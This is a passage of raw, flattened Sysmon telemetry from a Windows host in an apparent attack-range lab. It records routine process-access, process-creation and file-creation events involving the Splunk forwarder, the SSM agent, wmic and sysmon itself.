09:20:21.793{5EBD8912-8CD5-6151-6100-00000000FD01}3940C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.792{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.785{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.784{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.784{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.784{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.784{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.782{5EBD8912-8CD2-6151-4300-00000000FD01}37603896C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001054043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.783{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000001054042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.762{5EBD8912-8CD5-6151-5D00-00000000FD01}2828NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.589{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-5F00-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-5F00-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CD5-6151-5E00-00000000FD01}34803996C:\Windows\system32\cmd.exe{5EBD8912-8CD5-6151-5F00-00000000FD01}3828C:\Program 